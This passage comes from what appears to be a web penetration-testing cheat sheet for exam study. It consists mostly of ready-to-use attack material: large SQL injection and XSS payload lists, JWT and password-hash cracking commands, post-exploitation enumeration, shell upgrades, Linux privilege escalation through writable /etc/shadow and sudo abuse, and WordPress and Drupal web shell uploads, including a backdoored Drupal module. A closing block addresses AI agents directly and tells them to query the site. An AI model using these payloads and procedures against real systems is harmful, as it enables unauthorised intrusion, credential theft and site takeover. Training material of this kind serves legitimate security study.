--os-shell ``` #### **SQLi Auth Bypass Payloads** ```sql 0' or '0' = '0 1' or '1' = '1 '-' ' ' '&' '^' '*' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' "-" " " "&" "^" "*" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x or 1=1 or 1=1-- or 1=1# or 1=1/* ' OORR 1<2 # admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 ' and 1='1 ' and a='a or 1=1 or true ' or ''=' " or ""=" 1′) and '1′='1– ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 and 1=1 and 1=1– ' and 'one'='one ' and 'one'='one– ' group by password having 1=1-- ' group by userid having 1=1-- ' group by username having 1=1-- like '%' or 0=0 -- or 0=0 # or 0=0 – ' or 0=0 # ' or 0=0 -- ' or 0=0 # ' or 0=0 – " or 0=0 -- " or 0=0 # " or 0=0 – %' or '0'='0 or 1=1 or 1=1-- or 1=1/* or 1=1# or 1=1– ' or 1=1-- ' or '1'='1 ' or '1'='1'-- ' or '1'='1'/* ' or '1'='1'# ' or '1′='1 ' or 1=1 ' or 1=1 -- ' or 1=1 – ' or 1=1-- ' or 1=1;# ' or 1=1/* ' or 1=1# ' or 1=1– ') or '1'='1 ') or '1'='1-- ') or '1'='1'-- ') or '1'='1'/* ') or '1'='1'# ') or ('1'='1 ') or ('1'='1-- ') or ('1'='1'-- ') or ('1'='1'/* ') or ('1'='1'# 'or'1=1 'or'1=1′ " or "1"="1 " or "1"="1"-- " or "1"="1"/* " or "1"="1"# " or 1=1 " or 1=1 -- " or 1=1 – " or 1=1-- " or 1=1/* " or 1=1# " or 1=1– ") or "1"="1 ") or "1"="1"-- ") or "1"="1"/* ") or "1"="1"# ") or ("1"="1 ") or ("1"="1"-- ") or ("1"="1"/* ") or ("1"="1"# ) or '1′='1– ) or ('1′='1– ' or 1=1 LIMIT 1;# 'or 1=1 or ''=' "or 1=1 or ""=" ' or 'a'='a ' or a=a-- ' or a=a– ') or ('a'='a " or "a"="a ") or ("a"="a ') or ('a'='a and hi") or ("a"="a ' or 'one'='one ' or 'one'='one– ' or uid like '% ' or uname like '% ' or userid like '% ' or user like '% ' or username like '% ' or 'x'='x ') or ('x'='x " or "x"="x ' OR 'x'='x'#; '=' 'or' and '=' 'or' ' UNION ALL SELECT 1, @@version;# ' UNION ALL SELECT system_user(),user();# ' UNION select table_schema,table_name FROM information_Schema.tables;# admin' and substring(password/text(),1,1)='7 ' and substring(password/text(),1,1)='7 ' or 1=1 limit 1 -- -+ '="or' ' and 'x'='x admin' or 1=1;-- ?id=1' order by 1 --+ ?id=1' and "a"="a"--+ ?id=1' and database()="securtiy"--+ ?id=1' and substring(database(),1,1)="a"--+ ?id=1' and sleep(2) and "a"="a"--+ ?id=1' and sleep(2) and substring(database(),1,1)="a"--+ '+||+1=1# ``` #### **SQLi Payloads** ```sql ' '' ` `` , " "" / // \ \\ ; ' or " -- or # ' OR '1 ' OR 1 -- - " OR "" = " " OR 1 = 1 -- - ' OR '' = ' '=' 'LIKE' '=0--+ OR 1=1 ' OR 'x'='x ' AND id IS NULL; -- '''''''''''''UNION SELECT '2 %00 /*…*/ + addition, concatenate (or space in url) || (double pipe) concatenate % wildcard attribute indicator @variable local variable @@variable global variable AND 1 AND 0 AND true AND false 1-false 1-true 1*56 -2 1' ORDER BY 1--+ 1' ORDER BY 2--+ 1' ORDER BY 3--+ 1' ORDER BY 1,2--+ 1' ORDER BY 1,2,3--+ 1' GROUP BY 1,2,--+ 1' GROUP BY 1,2,3--+ ' GROUP BY columnnames having 1=1 -- -1' UNION SELECT 1,2,3--+ ' UNION SELECT sum(columnname ) from tablename -- -1 UNION SELECT 1 INTO @,@ -1 UNION SELECT 1 INTO @,@,@ 1 AND (SELECT * FROM Users) = 1 ' AND MID(VERSION(),1,1) = '5'; ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- ,(select * from (select(sleep(10)))a) %2c(select%20*%20from%20(select(sleep(10)))a) ';WAITFOR DELAY '0:0:30'-- OR 1=1 OR 1=0 OR x=x OR x=y OR 1=1# OR 1=0# OR x=x# OR x=y# OR 1=1-- OR 1=0-- OR x=x-- OR x=y-- OR 3409=3409 AND ('pytW' LIKE 'pytW OR 3409=3409 AND ('pytW' LIKE 'pytY HAVING 1=1 HAVING 1=0 HAVING 1=1# HAVING 1=0# HAVING 1=1-- HAVING 1=0-- AND 1=1 AND 1=0 AND 1=1-- AND 1=0-- AND 1=1# AND 1=0# AND 1=1 AND '%'=' AND 1=0 AND '%'=' AND 1083=1083 AND (1427=1427 AND 7506=9091 AND (5913=5913 AND 1083=1083 AND ('1427=1427 AND 7506=9091 AND ('5913=5913 AND 7300=7300 AND 'pKlZ'='pKlZ AND 7300=7300 AND 'pKlZ'='pKlY AND 7300=7300 AND ('pKlZ'='pKlZ AND 7300=7300 AND ('pKlZ'='pKlY AS INJECTX WHERE 1=1 AND 1=1 AS INJECTX WHERE 1=1 AND 1=0 AS INJECTX WHERE 1=1 AND 1=1# AS INJECTX WHERE 1=1 AND 1=0# AS INJECTX WHERE 1=1 AND 1=1-- AS INJECTX WHERE 1=1 AND 1=0-- WHERE 1=1 AND 1=1 WHERE 1=1 AND 1=0 WHERE 1=1 AND 1=1# WHERE 1=1 AND 1=0# WHERE 1=1 AND 1=1-- WHERE 1=1 AND 1=0-- ' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL,NULL-- ' UNION SELECT NULL,NULL,NULL,NULL-- ' UNION SELECT NULL,NULL,NULL,NULL,NULL-- ORDER BY 1-- ORDER BY 2-- ORDER BY 3-- ORDER BY 4-- ORDER BY 5-- ORDER BY 6-- ORDER BY 7-- ORDER BY 8-- ORDER BY 9-- ORDER BY 10-- ORDER BY 11-- ORDER BY 12-- ORDER BY 13-- ORDER BY 14-- ORDER BY 15-- ORDER BY 16-- ORDER BY 17-- ORDER BY 18-- ORDER BY 19-- ORDER BY 20-- ORDER BY 21-- ORDER BY 22-- ORDER BY 23-- ORDER BY 24-- ORDER BY 25-- ORDER BY 26-- ORDER BY 27-- ORDER BY 28-- ORDER BY 29-- ORDER BY 30-- ORDER BY 31337-- ORDER BY 1# ORDER BY 2# ORDER BY 3# ORDER BY 4# ORDER BY 5# ORDER BY 6# ORDER BY 7# ORDER BY 8# ORDER BY 9# ORDER BY 10# ORDER BY 11# ORDER BY 12# ORDER BY 13# ORDER BY 14# ORDER BY 15# ORDER BY 16# ORDER BY 17# ORDER BY 18# ORDER BY 19# ORDER BY 20# ORDER BY 21# ORDER BY 22# ORDER BY 23# ORDER BY 24# ORDER BY 25# ORDER BY 26# ORDER BY 27# ORDER BY 28# ORDER BY 29# ORDER BY 30# ORDER BY 31337# ORDER BY 1 ORDER BY 2 ORDER BY 3 ORDER BY 4 ORDER BY 5 ORDER BY 6 ORDER BY 7 ORDER BY 8 ORDER BY 9 ORDER BY 10 ORDER BY 11 ORDER BY 12 ORDER BY 13 ORDER BY 14 ORDER BY 15 ORDER BY 16 ORDER BY 17 ORDER BY 18 ORDER BY 19 ORDER BY 20 ORDER BY 21 ORDER BY 22 ORDER BY 23 ORDER BY 24 ORDER BY 25 ORDER BY 26 ORDER BY 27 ORDER BY 28 ORDER BY 29 ORDER BY 30 ORDER BY 31337 RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- %' AND 8310=8310 AND '%'=' %' AND 8310=8311 AND '%'=' and (select substring(@@version,1,1))='X' and (select substring(@@version,1,1))='M' and (select substring(@@version,2,1))='i' and (select substring(@@version,2,1))='y' and (select substring(@@version,3,1))='c' and (select substring(@@version,3,1))='S' and (select substring(@@version,3,1))='X' sleep(5)# 1 or sleep(5)# " or sleep(5)# ' or sleep(5)# " or sleep(5)=" ' or sleep(5)=' 1) or sleep(5)# ") or sleep(5)=" ') or sleep(5)=' 1)) or sleep(5)# ")) or sleep(5)=" ')) or sleep(5)=' ;waitfor delay '0:0:5'-- );waitfor delay '0:0:5'-- ';waitfor delay '0:0:5'-- ";waitfor delay '0:0:5'-- ');waitfor delay '0:0:5'-- ");waitfor delay '0:0:5'-- ));waitfor delay '0:0:5'-- '));waitfor delay '0:0:5'-- "));waitfor delay '0:0:5'-- benchmark(10000000,MD5(1))# 1 or benchmark(10000000,MD5(1))# " or benchmark(10000000,MD5(1))# ' or benchmark(10000000,MD5(1))# 1) or benchmark(10000000,MD5(1))# ") or benchmark(10000000,MD5(1))# ') or benchmark(10000000,MD5(1))# 1)) or benchmark(10000000,MD5(1))# ")) or benchmark(10000000,MD5(1))# ')) or benchmark(10000000,MD5(1))# pg_sleep(5)-- 1 or pg_sleep(5)-- " or pg_sleep(5)-- ' or pg_sleep(5)-- 1) or pg_sleep(5)-- ") or pg_sleep(5)-- ') or pg_sleep(5)-- 1)) or pg_sleep(5)-- ")) or pg_sleep(5)-- ')) or pg_sleep(5)-- AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP) AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)# SLEEP(5)# SLEEP(5)-- SLEEP(5)=" SLEEP(5)=' or SLEEP(5) or SLEEP(5)# or SLEEP(5)-- or SLEEP(5)=" or SLEEP(5)=' waitfor delay '00:00:05' waitfor delay '00:00:05'-- waitfor delay '00:00:05'# benchmark(50000000,MD5(1)) benchmark(50000000,MD5(1))-- benchmark(50000000,MD5(1))# or benchmark(50000000,MD5(1)) or benchmark(50000000,MD5(1))-- or benchmark(50000000,MD5(1))# pg_SLEEP(5) pg_SLEEP(5)-- pg_SLEEP(5)# or pg_SLEEP(5) or pg_SLEEP(5)-- or pg_SLEEP(5)# '\" AnD SLEEP(5) AnD SLEEP(5)-- AnD SLEEP(5)# &&SLEEP(5) &&SLEEP(5)-- &&SLEEP(5)# ' AnD SLEEP(5) ANd '1 '&&SLEEP(5)&&'1 ORDER BY SLEEP(5) ORDER BY SLEEP(5)-- ORDER BY SLEEP(5)# (SELECT * FROM (SELECT(SLEEP(5)))ecMj) (SELECT * FROM (SELECT(SLEEP(5)))ecMj)# (SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- +benchmark(3200,SHA1(1))+' + SLEEP(10) + ' RANDOMBLOB(500000000/2) AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) RANDOMBLOB(1000000000/2) AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/ '|| pg_sleep(10) --+ ``` ### **HTML Injection** ```html

HTML

html

HTML

HTML

HTML

HTML
HTML
HTML

HTML

HTML HTML HTML AI
address,address

Armour Infosec

HTML

HTML

--> --> --> --> --> --> --> "\> <> '-alert(1)-' > {{$on.constructor('alert(1)')()}} \"-alert(1)}// "-top['al\x65rt']('sailay')-" 






javascript:alert(document.cookie)
">
">
">
">
">
">
">
">
?s="onerror="innerHTML=decodeURIComponet.call`${location.hash}`"#
?s="onerror="location=/javascript:/.source%2Blocation"&a=%0A+alert(1337)
?s="onerror="window.onerror=alert;throw 1337"
?s="onerror="alert%261par;1337%26rpar;"
?s="onerror="alert`1337`"




%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alert`xss`%3E


 




alert(123)
alert("test")
alert(document.cookie)
alert(document.domain)
confirm(123)
confirm("test")
confirm(document.cookie)
confirm(document.domain)
prompt(123)
prompt("test")
prompt(document.cookie)
prompt(document.domain)
```

### JWT

Capture JWT token using Burp Suite (after a login) and crack it using Hashcat or JohnTheRipper

```bash
hashcat -m 16500 -a 0 jwt.txt /usr/share/seclists/Passwords/scraped-JWT-secrets.txt
secret-key
```

Go to:  for discovering more info regarding token.

### API

Search the documentation file to discover endpoints available for attack target.

## Post-Exploitation

### **Win Local Enumeration**

```bash
# MSF Meterpreter
getuid
sysinfo
show_mount
cat C:\\Windows\\System32\\eula.txt
getprivs
pgrep explorer.exe
migrate 

# Win CMD - run 'shell' in Meterpreter
## System
hostname
systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn

## Users
whoami
whoami /priv
query user
net users
net user 
net localgroup
net localgroup Administrators
net localgroup "Remote Desktop Users"

## Network
ipconfig
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh advfirewall show allprofiles

## Services
ps
net start
wmic service list brief
tasklist /SVC
schtasks /query /fo LIST
schtasks /query /fo LIST /v

# Metasploit
use post/windows/gather/enum_logged_on_users
use post/windows/gather/win_privs
use post/windows/gather/enum_logged_on_users
use post/windows/gather/checkvm
use post/windows/gather/enum_applications
use post/windows/gather/enum_computers
use post/windows/gather/enum_patches
use post/windows/gather/enum_shares

# JAWS - Automatic Local Enumeration - Powershell
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename Jaws-Enum.txt
```

### **Linux Local Enumeration**

```bash
# MSF Meterpreter
getuid
sysinfo
ifconfig
netstat
route
arp
ps
pgrep vsftpd

# Linux SHELL - run 'shell' in Meterpreter
## System
/bin/bash -i
cd /root
hostname
cat /etc/*issue
cat /etc/*release
uname -a
dpkg -l

env
lscpu
free -h
df -h
lsblk | grep sd

## Users
whoami
ls -lah /home
cat /etc/passwd
cat /etc/passwd | grep -v /nologin
groups 
groups root
groups
who
w
last
lastlog

## Network
ifconfig
ip -br -c a
ip a
cat /etc/networks
cat /etc/hostname
cat /etc/hosts
cat /etc/resolv.conf
arp -a

## Services
ps
ps aux
ps aux | grep msfconsole
ps aux | grep root
top
cat /etc/cron*
crontab -l

# Metasploit
use post/linux/gather/enum_configs
use post/linux/gather/enum_network
use post/linux/gather/enum_system
use post/linux/gather/checkvm

# LINENUM - Automatic Enumeration
cd /tmp
upload LinEnum.sh
shell
/bin/bash -i
chmod +x LinEnum.sh
./LinEnum.sh

./LinEnum.sh -s -k  -r  -e /tmp/ -t
```

### **Transferring Files**

```bash
# PYTHON WEB SERVER
python -V
python3 -V
py -v # on Windows

# Python 2.7
python -m SimpleHTTPServer 

# Python 3.7
python3 -m http.server 

# On Windows, try 
python -m http.server 
py -3 -m http.server 
```

```bash
# TMUX Terminal Multiplexer
sudo apt install tmux -y
```

**Shells**

```bash
cat /etc/shells
    # /etc/shells: valid login shells
    /bin/sh
    /bin/dash
    /bin/bash
    /bin/rbash

/bin/bash -i

/bin/sh -i
```

**TTY Shells**

```bash
# BASH
/bin/bash -i
/bin/sh -i
SHELL=/bin/bash script -q /dev/null

# Setup environment variables
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=/bin/bash
```

```bash
# PYTHON
python --version
python -c 'import pty; pty.spawn("/bin/bash")'

## Fully Interactive TTY
# Background (CTRL+Z) the current remote shell
stty raw -echo && fg
# Reinitialize the terminal with reset
reset
```

```bash
# FULL TTY PYTHON3 SHELL
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Background CTRL+Z
stty raw -echo && fg
# ENTER
export SHELL=/bin/bash
export TERM=screen
stty rows 36 columns 157
# stty -a to get the rows & columns of the attacker terminal
reset
```

```bash
# PERL
perl -h
perl -e 'exec "/bin/bash";'
```

## **Privilege Escalation**

### **Win Privilege Escalation**

```bash
# PrivescCHECK - PowerShell script
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML,XML"

## Basic mode
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

## Extended Mode + Export Txt Report
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME%"
```

### **Linux Privilege Escalation**

```bash
# Writable files
find / -not -type l -perm -o+w

# e.g. of /etc/shadow with write permissions
openssl passwd -1 -salt abc password123
vim /etc/shadow # Paste the hashed password
su

# SETUID - SUDO privileges
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm -u=s -type f 2>/dev/null

sudo -l

# e.g. User can run 'man' with SUDO Privileges
sudo man ls
	!/bin/bash
```

### **Dumping & Cracking**

#### **Windows**

```bash
hashdump

# JohnTheRipper
john --list=formats | grep NT
john --format=NT hashes.txt

gzip -d /usr/share/wordlists/rockyou.txt.gz
john  --wordlist=/usr/share/wordlists/rockyou.txt # To crack the password from your previous output (hashdump,shadow file )
john --format=NT win_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

john -wordlist /usr/share/wordlists/rockyou.txt crack.hash
john -wordlist /usr/share/wordlists/rockyou.txt -users users.txt test.hash

#this is another way to crack passwords (that requires shadow file with passwd file)
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

hashcat -a 3 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -a 3 -m 1000 --show hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 -a 0 -o found.txt --remove crack.hash rockyou-10.txt
```

#### **Linux**

```bash
cat /etc/shadow

# Metasploit
use post/linux/gather/hashdump

john --format=sha512crypt linux.hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
john -wordlist /usr/share/wordlists/rockyou.txt crack.hash
john -wordlist /usr/share/wordlists/rockyou.txt -users users.txt test.hash

# Hashcat
hashcat --help | grep 1800
hashcat -a 3 -m 1800 linux.hashes.txt /usr/share/wordlists/rockyou.txt
ashcat -m 1000 -a 0 -o found.txt --remove crack.hash rockyou-10.txt
```

## Frameworks

### Wordpress

#### **Basic Information**

**Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`\
**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
**Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)

In **wp-config.php** you can find the root password of the database.

Default login paths to check: ***/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/***

#### **Main WordPress Files**

* `index.php`
* `license.txt` contains useful information such as the version WordPress installed.
* `wp-activate.php` is used for the email activation process when setting up a new WordPress site.
* Login folders (may be renamed to hide it):
  * `/wp-admin/login.php`
  * `/wp-admin/wp-login.php`
  * `/login.php`
  * `/wp-login.php`
* `xmlrpc.php` is a file that represents a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
* The `wp-content` folder is the main directory where plugins and themes are stored.
* `wp-content/uploads/` Is the directory where any files uploaded to the platform are stored.
* `wp-includes/` This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.

**Post exploitation**

* The `wp-config.php` file contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.

**Users Permissions**

* **Administrator**
* **Editor**: Publish and manages his and others posts
* **Author**: Publish and manage his own posts
* **Contributor**: Write and manage his posts but cannot publish them
* **Subscriber**: Browser posts and edit their profile

#### **Passive Enumeration**

**Get WordPress version**

Check if you can find the files `/license.txt` or `/readme.html`

Inside the **source code** of the page (example from ):

* Grep

```bash
curl https://victim.com/ | grep 'content="WordPress'
```

* Meta name




* CSS link files




* JavaScript files

#### **Get Plugins**

```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```

#### **Get Themes**

```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```

#### **Extract versions in general**

```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```

#### **Active enumeration**

#### **Plugins and Themes**

You probably won't be able to find all the Plugins and Themes passible. In order to discover all of them, you will need to **actively Brute Force a list of Plugins and Themes** (hopefully for us there are automated tools that contains this lists).

**Users**

**ID Brute**

You get valid users from a WordPress site by Brute Forcing users IDs:

```bash
curl -s -I -X GET http://blog.example.com/?author=1
```

If the responses are **200** or **30X**, that means that the id is **valid**. If the the response is **400**, then the id is **invalid**.

**wp-json**

You can also try to get information about the users by querying:

```bash
curl http://blog.example.com/wp-json/wp/v2/users
```

**Only information about the users that has this feature enable will be provided**.

Also note that **/wp-json/wp/v2/pages** could leak IP addresses.

**Login username enumeration**

When login in **`/wp-login.php`** the **message** is **different** is the indicated **username exists or not**.

**WPScan**

```bash
wpscan -h #List WPscan Parameters
wpscan --update #Update WPscan

#Enumerate WordPress using WPscan


wpscan --url "http://" -e t #All Themes Installed

wpscan --url "http://" -e vt #Vulnerable Themes Installed

wpscan --url "http://"  -e p #All Plugins Installed

wpscan --url "http://"  -e vp #Vulnerable Themes Installed

wpscan --url "http://"  -e u #WordPress Users

wpscan --url "http://"  --passwords path-to-wordlist #Brute Force WordPress Passwords

#Upload Reverse Shell to WordPress
http:///wordpress/wp-content/themes/twentyfifteen/404.php

#Upload using Metasploit
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit
```

### Drupal

#### Discovery

* Check **meta**

```bash
curl https://www.drupal.org/ | grep 'content="Drupal'
```

* **Node**: Drupal **indexes its content using nodes**. A node can **hold anything** such as a blog post, poll, article, etc. The page URIs are usually of the form `/node/`.

```bash
curl drupal-site.com/node/1
```

#### Enumeration

Drupal supports **three types of users** by default:

1. **`Administrator`**: This user has complete control over the Drupal website.
2. **`Authenticated User`**: These users can log in to the website and perform operations such as adding and editing articles based on their permissions.
3. **`Anonymous`**: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.

**Version**

* Check `/CHANGELOG.txt`

```bash
curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 ""

Drupal 7.57, 2018-02-21
```

{% hint style="info" %} Newer installs of Drupal by default block access to the `CHANGELOG.txt` and `README.txt` files. {% endhint %}

#### **Username enumeration**

**Register**

In */user/register* just try to create a username and if the name is already taken it will be notified:




**Request new password**

If you request a new password for an existing username:




If you request a new password for a non-existent username:




**Get number of users**

Accessing */user/\* you can see the number of existing users, in this case is 2 as */users/3* returns a not found error:







**Hidden pages**

**Fuzz `/node/$` where `$` is a number** (from 1 to 500 for example).\
You could find **hidden pages** (test, dev) which are not referenced by the search engines.

**Installed modules info**

```bash
#From https://twitter.com/intigriti/status/1439192489093644292/photo/1
#Get info on installed modules
curl https://example.com/config/sync/core.extension.yml
curl https://example.com/core/core.services.yml

# Download content from files exposed in the previous step
curl https://example.com/config/sync/swiftmailer.transport.yml
```

**Automatic**

```bash
droopescan scan drupal -u http://drupal-site.local
```

**RCE**

**With PHP Filter Module**

{% hint style="warning" %} In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which "Allows embedded PHP code/snippets to be evaluated." {% endhint %}

You need the **plugin php to be installed** (check it accessing to */modules/php* and if it returns a **403** then, **exists**, if **not found**, then the **plugin php isn't installed**)

Go to *Modules* -> (**Check**) *PHP Filter* -> *Save configuration*




Then click on *Add content* -> Select *Basic Page* or *Article -*> Write *php shellcode on the body* -> Select *PHP code* in *Text format* -> Select *Preview*




Finally just access the newly created node:

```
curl http://drupal-site.local/node/3
```

**Install PHP Filter Module**

From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. To leverage this functionality, we would have to **install the module ourselves**.

1. Download the most recent version of the module from the Drupal website.
   1. wget 
2. Once downloaded go to **`Administration`** > **`Reports`** > **`Available updates`**.
3. Click on **`Browse`**`,` select the file from the directory we downloaded it to, and then click **`Install`**.
4. Once the module is installed, we can click on **`Content`** and **create a new basic page**, similar to how we did in the Drupal 7 example. Again, be sure to **select `PHP code` from the `Text format` dropdown**.

**Backdoored Module**

A backdoored module can be created by **adding a shell to an existing module**. Modules can be found on the drupal.org website. Let's pick a module such as [CAPTCHA](https://www.drupal.org/project/captcha). Scroll down and copy the link for the tar.gz [archive](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz).

* Download the archive and extract its contents.

```bash
wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
```

* Create a **PHP web shell** with the contents:

```bash

```

* Next, we need to create a **`.htaccess`** file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the **`/modules`** folder.

```bash

RewriteEngine On
RewriteBase /

```

* The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive.

```bash
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/
```

* Assuming we have **administrative access** to the website, click on **`Manage`** and then **`Extend`** on the sidebar. Next, click on the **`+ Install new module`** button, and we will be taken to the install page, such as `http://drupal-site.local/admin/modules/install` Browse to the backdoored Captcha archive and click **`Install`**.
* Once the installation succeeds, browse to **`/modules/captcha/shell.php`** to execute commands.

**Post Exploitation**

**Read settings.php**

```bash
find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
```

**Dump users from DB**

```bash
mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'
```

**\[CVE-2018-7600] Drupalgeddon 2**



In late March 2018, a critical vulnerability was uncovered in Drupal CMS. **Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1** versions were affected by this vulnerability.

It allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or standard module configurations.

A lot of PoC is available to exploit this vulnerability.

### Spring

#### **Authorization Bypass**

[CVE 2022-22978: **Authorization Bypass in RegexRequestMatcher**](https://github.com/ducluongtran9121/CVE-2022-22978-PoC)

**References (thanks to all <3):**



[https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/drupal)




---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dev-angelist.gitbook.io/ewptxv3-notes/ewptx-cheat-sheet.md?ask=
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.